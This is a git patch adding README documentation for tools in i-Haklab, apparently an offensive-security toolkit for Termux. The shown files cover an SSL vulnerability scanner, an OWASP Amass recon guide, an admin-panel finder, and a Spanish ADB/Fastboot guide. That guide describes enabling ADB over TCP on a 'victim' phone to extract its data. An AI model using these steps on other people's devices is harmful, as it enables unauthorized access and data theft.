From ac52dee4a9cced1a22cbf5093f5c00daee71b36c Mon Sep 17 00:00:00 2001 From: Z2l0aHViCg== Date: Sun, 8 Dec 2024 21:25:10 -0500 Subject: [PATCH] =?UTF-8?q?=F0=9F=94=AE=20:=20add?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../etc/i-Haklab/Tools/Readme/A/a2sv.md | 125 + .../i-Haklab/Tools/Readme/A/adbfastboot.md | 124 + .../etc/i-Haklab/Tools/Readme/A/adminpanel.md | 8 + .../etc/i-Haklab/Tools/Readme/A/amass.md | 398 ++ .../etc/i-Haklab/Tools/Readme/A/androbugs.md | 110 + .../etc/i-Haklab/Tools/Readme/A/aoichk.md | 75 + .../etc/i-Haklab/Tools/Readme/A/aquatone.md | 88 + .../etc/i-Haklab/Tools/Readme/B/beef.md | 18 + .../etc/i-Haklab/Tools/Readme/B/bettercap.md | 36 + .../etc/i-Haklab/Tools/Readme/B/binwalk.md | 54 + .../etc/i-Haklab/Tools/Readme/B/blackbox.md | 3 + .../etc/i-Haklab/Tools/Readme/B/botgram.md | 51 + .../etc/i-Haklab/Tools/Readme/B/burpsuite.md | 1505 +++++ .../etc/i-Haklab/Tools/Readme/C/chatgpt.md | 49 + .../etc/i-Haklab/Tools/Readme/C/clamav.md | 354 ++ .../etc/i-Haklab/Tools/Readme/C/cloudbunny.md | 93 + .../i-Haklab/Tools/Readme/C/code-server.md | 71 + .../etc/i-Haklab/Tools/Readme/C/credmap.md | 45 + .../etc/i-Haklab/Tools/Readme/C/crunch.md | 722 +++ .../i-Haklab/Tools/Readme/C/cryptovenom.md | 219 + .../etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md | 55 + .../etc/i-Haklab/Tools/Readme/D/d-tect.md | 37 + .../etc/i-Haklab/Tools/Readme/D/dex2jar.md | 33 + .../etc/i-Haklab/Tools/Readme/D/dns2tcp.md | 131 + .../etc/i-Haklab/Tools/Readme/E/embed.md | 81 + .../etc/i-Haklab/Tools/Readme/E/evilurl.md | 69 + .../etc/i-Haklab/Tools/Readme/E/exiF.md | 10 + .../etc/i-Haklab/Tools/Readme/E/exploitdb.md | 0 .../etc/i-Haklab/Tools/Readme/F/fake-sms.md | 44 + .../etc/i-Haklab/Tools/Readme/F/fbbrute.md | 1 + .../.local/etc/i-Haklab/Tools/Readme/F/fbi.md | 43 + .../etc/i-Haklab/Tools/Readme/F/ffmpeg.md | 126 + .../etc/i-Haklab/Tools/Readme/F/fuzzdb.md | 89 + .../.local/etc/i-Haklab/Tools/Readme/G/gdb.md | 4559 
++++++++++++++ .../etc/i-Haklab/Tools/Readme/G/geoip.md | 1 + .../etc/i-Haklab/Tools/Readme/G/ghost.md | 121 + .../etc/i-Haklab/Tools/Readme/G/gobuster.md | 822 +++ .../etc/i-Haklab/Tools/Readme/G/gophish.md | 60 + .../etc/i-Haklab/Tools/Readme/H/h8mail.md | 193 + .../etc/i-Haklab/Tools/Readme/H/hakku.md | 83 + .../etc/i-Haklab/Tools/Readme/H/hasher.md | 37 + .../etc/i-Haklab/Tools/Readme/H/hashid.md | 65 + .../etc/i-Haklab/Tools/Readme/H/hatcloud.md | 34 + .../etc/i-Haklab/Tools/Readme/H/hunner.md | 11 + .../etc/i-Haklab/Tools/Readme/H/hydra.md | 25 + .../etc/i-Haklab/Tools/Readme/I/i-Haklab.md | 111 + .../etc/i-Haklab/Tools/Readme/I/infoga.md | 73 + .../i-Haklab/Tools/Readme/I/ipgeolacation.md | 140 + .../i-Haklab/Tools/Readme/J/johnTheRipper.md | 187 + .../etc/i-Haklab/Tools/Readme/K/kerbrute.md | 60 + .../i-Haklab/Tools/Readme/L/localtunnel.md | 70 + .../etc/i-Haklab/Tools/Readme/L/lockphish.md | 31 + .../etc/i-Haklab/Tools/Readme/M/maltego.md | 28 + .../etc/i-Haklab/Tools/Readme/M/metasploit.md | 88 + .../etc/i-Haklab/Tools/Readme/N/neovim.md | 53 + .../etc/i-Haklab/Tools/Readme/N/ngrok.md | 5283 +++++++++++++++++ .../etc/i-Haklab/Tools/Readme/N/nikto.md | 100 + .../etc/i-Haklab/Tools/Readme/N/nmap.md | 196 + .../etc/i-Haklab/Tools/Readme/O/objection.md | 31 + .../etc/i-Haklab/Tools/Readme/O/octosuite.md | 53 + .../i-Haklab/Tools/Readme/O/orbitaldump.md | 62 + .../etc/i-Haklab/Tools/Readme/O/osintgram.md | 177 + .../i-Haklab/Tools/Readme/O/osrframework.md | 91 + .../etc/i-Haklab/Tools/Readme/P/pasterm.md | 68 + .../etc/i-Haklab/Tools/Readme/P/phomber.md | 202 + .../i-Haklab/Tools/Readme/P/phoneinfoga.md | 56 + .../i-Haklab/Tools/Readme/P/phonesploit.md | 41 + .../etc/i-Haklab/Tools/Readme/P/putty.md | 40 + .../etc/i-Haklab/Tools/Readme/P/pybelt.md | 60 + .../etc/i-Haklab/Tools/Readme/Q/quack.md | 131 + .../etc/i-Haklab/Tools/Readme/R/radare2.md | 1585 +++++ .../etc/i-Haklab/Tools/Readme/R/recon-ng.md | 17 + .../etc/i-Haklab/Tools/Readme/R/recondog.md | 59 + 
.../etc/i-Haklab/Tools/Readme/R/redhawk.md | 126 + .../i-Haklab/Tools/Readme/R/routersploit.md | 98 + .../etc/i-Haklab/Tools/Readme/S/saycheese.md | 21 + .../etc/i-Haklab/Tools/Readme/S/sayhello.md | 34 + .../etc/i-Haklab/Tools/Readme/S/seeker.md | 98 + .../etc/i-Haklab/Tools/Readme/S/shellphish.md | 29 + .../i-Haklab/Tools/Readme/S/shellsploit.md | 98 + .../etc/i-Haklab/Tools/Readme/S/sherlock.md | 211 + .../etc/i-Haklab/Tools/Readme/S/shodan.md | 234 + .../etc/i-Haklab/Tools/Readme/S/sigploit.md | 62 + .../i-Haklab/Tools/Readme/S/slowhttptest.md | 48 + .../etc/i-Haklab/Tools/Readme/S/snow.md | 53 + .../etc/i-Haklab/Tools/Readme/S/snscrape.md | 69 + .../etc/i-Haklab/Tools/Readme/S/spotichk.md | 73 + .../etc/i-Haklab/Tools/Readme/S/sqliv.md | 88 + .../etc/i-Haklab/Tools/Readme/S/sqlmap.md | 73 + .../etc/i-Haklab/Tools/Readme/T/tangalanga.md | 62 + .../i-Haklab/Tools/Readme/T/theblackhack.md | 39 + .../i-Haklab/Tools/Readme/T/theharvester.md | 113 + .../etc/i-Haklab/Tools/Readme/T/translate.md | 573 ++ .../etc/i-Haklab/Tools/Readme/T/trape.md | 145 + .../etc/i-Haklab/Tools/Readme/T/twifo-cli.md | 25 + .../etc/i-Haklab/Tools/Readme/U/userrecon.md | 8 + .../etc/i-Haklab/Tools/Readme/V/virustotal.md | 53 + .../etc/i-Haklab/Tools/Readme/V/vulns.md | 274 + .../etc/i-Haklab/Tools/Readme/W/webhackshl.md | 42 + .../etc/i-Haklab/Tools/Readme/W/websploit.md | 52 + .../etc/i-Haklab/Tools/Readme/W/whatweb.md | 490 ++ .../etc/i-Haklab/Tools/Readme/W/wpscan.md | 181 + .../etc/i-Haklab/Tools/Readme/X/xapt.md | 47 + .../etc/i-Haklab/Tools/Readme/X/xerosploit.md | 98 + .../.local/etc/i-Haklab/Tools/Readme/neovim | 40 +- 105 files changed, 23617 insertions(+), 11 deletions(-) create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md create mode 
100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/exploitdb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md create mode 100755 
.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md create mode 100755 
.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/objection.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/octosuite.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/orbitaldump.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/osintgram.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/osrframework.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/pasterm.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/phomber.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/phoneinfoga.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/phonesploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/putty.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/pybelt.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/Q/quack.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/radare2.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/recon-ng.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/recondog.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/redhawk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/routersploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/saycheese.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sayhello.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/seeker.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/shellphish.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/shellsploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sherlock.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/shodan.md create mode 100755 
.deb/home/.local/etc/i-Haklab/Tools/Readme/S/sigploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/slowhttptest.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/snow.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/snscrape.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/spotichk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sqliv.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sqlmap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/tangalanga.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/theblackhack.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/theharvester.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/translate.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/trape.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/twifo-cli.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/U/userrecon.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/V/virustotal.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/V/vulns.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/webhackshl.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/websploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/whatweb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/wpscan.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/X/xapt.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/X/xerosploit.md diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md new file mode 100755 index 00000000..a0d19a59 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md @@ -0,0 +1,125 @@ +[![MIT 
License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT) + + +## 1. A2SV? +Auto Scanning to SSL Vulnerability. + +HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc + + + +A. Support Vulnerability +``` +- CVE-2007-1858] Anonymous Cipher +- CVE-2012-4929] CRIME(SPDY) +- CVE-2014-0160] CCS Injection +- CVE-2014-0224] HeartBleed +- CVE-2014-3566] SSLv3 POODLE +- CVE-2015-0204] FREAK Attack +- CVE-2015-4000] LOGJAM Attack +- CVE-2016-0800] SSLv2 DROWN +``` + +B. Dev Plan +``` +- PLAN] SSL ACCF +- PLAN] SSL Information Analysis +``` +## 2. How to Install? +A. Download(clone) & Unpack A2SV +``` +$ git clone https://github.com/hahwul/a2sv.git +$ cd a2sv +``` +B. Install Python Package / OpenSSL + +``` +$ pip install argparse +$ pip install netaddr + +$ apt-get install openssl +``` +C. Run A2SV + +``` +$ python a2sv.py -h +``` +## 3. How to Use? +``` +usage: a2sv [-h] [-t TARGET] [-tf TARGETFILE] [-p PORT] [-m MODULE] +[-d DISPLAY] [-u] [-v] + +optional arguments: + -h, --helpshow this help message and exit + -t TARGET, --target TARGET +Target URL and IP Address + $ e.g -t 127.0.0.1 + -tf TARGETFILE, --targetfile TARGETFILE +Target file(list) URL and IP Address + $ e.g -tf ./target.list + -p PORT, --port PORT Custom Port / Default: 443 + $ e.g -p 8080 + -m MODULE, --module MODULE +Check SSL Vuln with one module +[anonymous]: Anonymous Cipher +[crime]: Crime(SPDY) +[heart]: HeartBleed +[ccs]: CCS Injection +[poodle]: SSLv3 POODLE +[freak]: OpenSSL FREAK +[logjam]: OpenSSL LOGJAM +[drown]: SSLv2 DROWN + -d DISPLAY, --display DISPLAY +Display output +[Y,y] Show output +[N,n] Hide output + -o OUT, --out OUT Result write to file + $ e.g -o /home/yourdir/result.txt + -u, --update Update A2SV (GIT) + -v, --version Show Version + +``` +[Scan SSL Vulnerability] + +``` +$ python a2sv.py -t 127.0.0.1 + +$ python a2sv.py -t 127.0.0.1 -m heartbleed + +$ python a2sv.py -t 127.0.0.1 -d n + +$ python a2sv.py -t 127.0.0.1 -p 8111 + +$ python 
a2sv.py -tf target_list.txt + +``` +[Update A2SV] + +``` +$ python a2sv.py -u + +$ python a2sv.py --update + +``` +## 4. Support +The answer is very slow because it's a project that I couldn't be careful about. + +## 5. Donate + +I like coffee! I'm a coffee addict.
+ +Buy Me A Coffee + +## 6. Screen shot + + + +## 7. Code Reference Site +``` +- poodle : https://github.com/supersam654/Poodle-Checker + +- heartbleed : https://github.com/sensepost/heartbleed-poc + +- ccs injection : https://github.com/Tripwire/OpenSSL-CCS-Inject-Test + +- freak : https://gist.github.com/martinseener/d50473228719a9554e6a diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md new file mode 100755 index 00000000..faa32c57 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md @@ -0,0 +1,124 @@ +¿Qué es ADB y Fastboot? +Las siglas ADB significan Android Debug Bridge y se corresponden con una herramienta de software que nos permite interactuar con nuestro smartphone Android. Así, por ejemplo, a través de ADB podemos ejecutar comandos para copiar archivos desde termux al teléfono, del teléfono a Termux o reiniciar el dispositivo en el modo bootloader. + +El Fastboot también es una herramienta de software con la que podemos comunicarnos y modificar partes de un smartphone Android (conectado a través de un cable USB). Con Fastboot vamos a poder desbloquear el bootloader, flashear un recovery, flashear el firmware completo o reiniciar el dispositivo en modo recovery. + +(i-Haklab)-(~) +└──┤ adb flash all bat + +Flasheando por completo el software. +Básicamente, desde Termux con ADB podemos comunicarnos con un smartphone Android que está encendido y su sistema Android funcionando, con Fastboot podemos comunicarnos con el dispositivo Android cuando lo hemos arrancado en modo bootloader. + +Con estas dos herramientas vamos a poder cambiar profundamente el software de nuestro smartphone o por lo menos acceder a él y realizar la sustraccion de datos. Por supuesto, todo esto se hace posible a través de un cable USB para conectar el smartphone a nuestro Termux. 
+ +Activar la depuración USB +Para que nuestro android reconozca el dispositivo necesitamos activar la depuración por USB. En Ajustes > Información del teléfono pulsaremos varias veces sobre 'Número de compilación' hasta que aparezcan las opciones de desarrollo. Ahora entraremos en estas opciones y activaremos la 'Depuración por USB'. + +ADB es una parte fundamental de Android Studio, el software para desarrollar aplicaciones en Android. Para obtener ADB en nuestro Termux solo debemos ejecutar los siguientes 5 comandos : + +Primero vamos a crear un directorio adbfiles en $HOME. +mkdir -p $HOME/adbfiles + +Posteriormente descargamos los ejecutables : +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/adb -P $PREFIX/bin/adb +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/adb.bin -P $PREFIX/bin/adb.bin +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/fastboot -P $PREFIX/bin/fastboot +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/fastboot-armeabi -P $PREFIX/bin/fastboot-armeabi + +Primeros Pasos: +1.-Conecta tu dispositivo Android y Termux con adb a una red Wi-Fi común a la que ambos puedan acceder. Ten en cuenta que no todos los puntos de acceso son adecuados; quizá necesites usar un punto de acceso cuyo firewall esté configurado correctamente para admitir adb. + +2.-Conecta el Android a Termux con adb con un cable USB. + +3.-Configura el dispositivo de destino para que busque una conexión TCP/IP en el puerto 5555 con: +(Victima)-(~) +└──┤ adb tcpip 5555 +Si no se tiene adb en el dispositivo victima utilizamos la aplicación Bugjaeger. + +4.-Desconecta el cable USB del dispositivo de destino. + +5.-Busca la dirección IP del dispositivo Android. Por ejemplo, puedes encontrar la dirección IP en Configuración > Acerca del dispositivo > Estado > Dirección IP. O desde la aplicacion Bugjaeger ennla opcion "Get wifi IP address". 
+ +6.-Realiza la conexion via adb de Termux con el dispositivo Android. +(i-Haklab)-(~) +└──┤ adb connect :5555 + +LISTO NUESTRA CONEXION ADB..... + +Comandos ADB más importantes : +(i-Haklab)-(~) +└──┤ adb devices +Con este comando obtenemos una lista de todos los dispositivos conectados. Esto es muy útil para saber que nuestro dispositivo ha sido reconocido y en el caso de que conectemos más de un dispositivo a la vez. + +(i-Haklab)-(~) +└──┤ adb reboot +Con esta instrucción reiniciaremos nuestro teléfono. + +(i-Haklab)-(~) +└──┤ adb reboot-recovery +Para reiniciar en modo recovery, por si necesitamos instalar algún archivo zip desde aquí. + +(i-Haklab)-(~) +└──┤ adb reboot-bootloader +Para reiniciar nuestro dispositivo en modo bootloader, para poder usar el fastboot. + +(i-Haklab)-(~) +└──┤ adb logcat > logcat.txt +Con este comando vamos a poder guardar el logcat por si tenemos problemas y necesitamos ayuda. Este es el registro de todas las operaciones que realiza el dispositivo. + +(i-Haklab)-(~) +└──┤ adb push $HOME/cualquier-archivo.txt /sdcard/downloads +Este comando copia el archivo especificado desde nuestro termux hacia el smartphone. Las rutas de archivo del comando son a modo de ejemplo, por tanto se tienen que adaptar en cada caso. Primero la ruta del archivo que está en termux y luego la ruta donde lo quieres copiar en el smartphone. + +(i-Haklab)-(~) +└──┤ adb pull /sdcard/downloads/document.pdf $HOME/carpeta +Con este comando conseguimos lo contrario que con el anterior, esto es, cargar un archivo desde nuestro smartphone/tablet a Termux. De nuevo, las rutas se tienen que adaptar a cada caso. Ahora ponemos primero la ruta del archivo en el smartphone y detrás la ruta en Termux. 
+ +(i-Haklab)-(~) +└──┤ adb shell screencap -p /sdcard/screenshot.png +(i-Haklab)-(~) +└──┤ adb pull /sdcard/screenshot.png +(i-Haklab)-(~) +└──┤ adb shell rm /sdcard/screenshot.png +Estos comandos sirven para crear una captura de pantalla de nuestro teléfono que quedará almacenada en la ruta que elijamos del smartphone. + +(i-Haklab)-(~) +└──┤ adb sideload update.zip +A través de este comando conseguimos actualizar oficialmente de forma manual nuestro smartphone. + +(i-Haklab)-(~) +└──┤ adb install "$HOME/WhatsApp.apk" +Como puede deducir, éste sirve para instalar una APK, una aplicación, en nuestro smartphone. Para ello tenemos que indicar la ruta completa de donde se encuentra la aplicación. Las comillas son necesarias si los nombres de las carpetas o archivos tienen espacios, si no los tienen las puedes omitir. + +(i-Haklab)-(~) +└──┤ adb backup -f FullBackup.ab -apk -all +Con este comando vamos a hacer una copia de seguridad de todas las aplicaciones con sus datos. En la práctica no todas las aplicaciones son compatibles con la copia de seguridad a través de ADB, así que la restauración puede ser un poco tortuosa y llena de sorpresas. + +(i-Haklab)-(~) +└──┤ adb help +Muestra en pantalla todos y cada uno de los comandos que se pueden ejecutar con ADB junto a una descripción general. + + +Comandos Fastboot más importantes + +(i-Haklab)-(~) +└──┤ fastboot devices +Con este comando obtenemos una lista de todos los dispositivos conectados. Esto es muy útil para saber que nuestro dispositivo ha sido reconocido y en el caso de que conectemos más de un dispositivo a la vez. + +(i-Haklab)-(~) +└──┤ fastboot oem unlock +Con esta instrucción vamos a poder desbloquear el bootloader del dispositivo. En algunos casos vamos a tener que añadir a esta instrucción un código de desbloqueo que nos va a facilitar el fabricante de nuestro smartphone. + +(i-Haklab)-(~) +└──┤ fastboot reboot +Para reiniciar el dispositivo de forma normal. 
+ +(i-Haklab)-(~) +└──┤ fastboot reboot-bootloader +Para volver a reiniciar en modo bootloader y seguir usando Fastboot. + +(i-Haklab)-(~) +└──┤ fastboot flash "partición" "archivo.img" +Para flashear una partición del dispositivo como: recovery, boot, radio o system. Con esta instrucción podemos instalar un custom recovery o flashear un nuevo firmware al completo. + +# @Ivam3 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md new file mode 100755 index 00000000..192dffdf --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md @@ -0,0 +1,8 @@ +# admin_penal +#How to Use +#require python 2.7 on your ...anything +#command "chmod +x admin_panel_finder.py" +#python2 admin_panel_finder.py +now enter your website: + +||warning|| This is for educational purposes only; I am not responsible for any bad activity. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md new file mode 100755 index 00000000..f531a245 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md @@ -0,0 +1,398 @@ +# [![OWASP Logo](../images/owasp_logo.png) OWASP Amass](https://owasp.org/www-project-amass/) - Users' Guide + +![Network graph](../images/network_06092018.png "Amass Network Mapping") + +---- + +## Simple Examples For Getting Started + +The amass tool and all the subcommands show options using the **'-h'** and **'-help'** flags: + +```bash +amass -help +``` + +Check the version by performing the following: + +```bash +amass -version +``` + +The most basic use of the tool for subdomain enumeration: + +```bash +amass enum -d example.com +``` + +Typical parameters for DNS enumeration: + +```bash +$ amass enum -v -src -ip -brute -min-for-recursive 2 -d example.com +[Google] www.example.com +[VirusTotal] ns.example.com +... 
+``` + +Executing the tool via the Docker image: + +```bash +docker run -v OUTPUT_DIR_PATH:/.config/amass/ caffix/amass:latest enum --list +``` + +The volume argument allows the Amass graph database to persist between executions and output files to be accessed on the host system. The first field (left of the colon) of the volume option is the amass output directory that is external to Docker, while the second field is the path, internal to Docker, where amass will write the output files. + +## Command-line Usage Information + +The amass tool has several subcommands shown below for handling your Internet exposure investigation. + +| Subcommand | Description | +|------------|-------------| +| intel | Collect open source intelligence for investigation of the target organization | +| enum | Perform DNS enumeration and network mapping of systems exposed to the Internet | +| viz | Generate visualizations of enumerations for exploratory analysis | +| track | Compare results of enumerations against common target organizations | +| db | Manage the graph databases storing the enumeration results | + +Each subcommand has its own arguments that are shown in the following sections. + +### The 'intel' Subcommand + +The intel subcommand can help you discover additional root domain names associated with the organization you are investigating. The data source sections of the configuration file are utilized by this subcommand in order to obtain passive intelligence, such as reverse whois information. 
+ +| Flag | Description | Example | +|------|-------------|---------| +| -active | Enable active recon methods | amass intel -active -addr 192.168.2.1-64 -p 80,443,8080 | +| -addr | IPs and ranges (192.168.1.1-254) separated by commas | amass intel -addr 192.168.2.1-64 | +| -asn | ASNs separated by commas (can be used multiple times) | amass intel -asn 13374,14618 | +| -cidr | CIDRs separated by commas (can be used multiple times) | amass intel -cidr 104.154.0.0/15 | +| -config | Path to the INI configuration file | amass intel -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass intel -whois -d example.com | +| -demo | Censor output to make it suitable for demonstrations | amass intel -demo -whois -d example.com | +| -df | Path to a file providing root domain names | amass intel -whois -df domains.txt | +| -dir | Path to the directory containing the graph database | amass intel -dir PATH -cidr 104.154.0.0/15 | +| -ef | Path to a file providing data sources to exclude | amass intel -whois -ef exclude.txt -d example.com | +| -exclude | Data source names separated by commas to be excluded | amass intel -whois -exclude crtsh -d example.com | +| -if | Path to a file providing data sources to include | amass intel -whois -if include.txt -d example.com | +| -include | Data source names separated by commas to be included | amass intel -whois -include crtsh -d example.com | +| -ip | Show the IP addresses for discovered names | amass intel -ip -whois -d example.com | +| -ipv4 | Show the IPv4 addresses for discovered names | amass intel -ipv4 -whois -d example.com | +| -ipv6 | Show the IPv6 addresses for discovered names | amass intel -ipv6 -whois -d example.com | +| -list | Print the names of all available data sources | amass intel -list | +| -log | Path to the log file where errors will be written | amass intel -log amass.log -whois -d example.com | +| -max-dns-queries | Maximum number of concurrent DNS queries | amass intel 
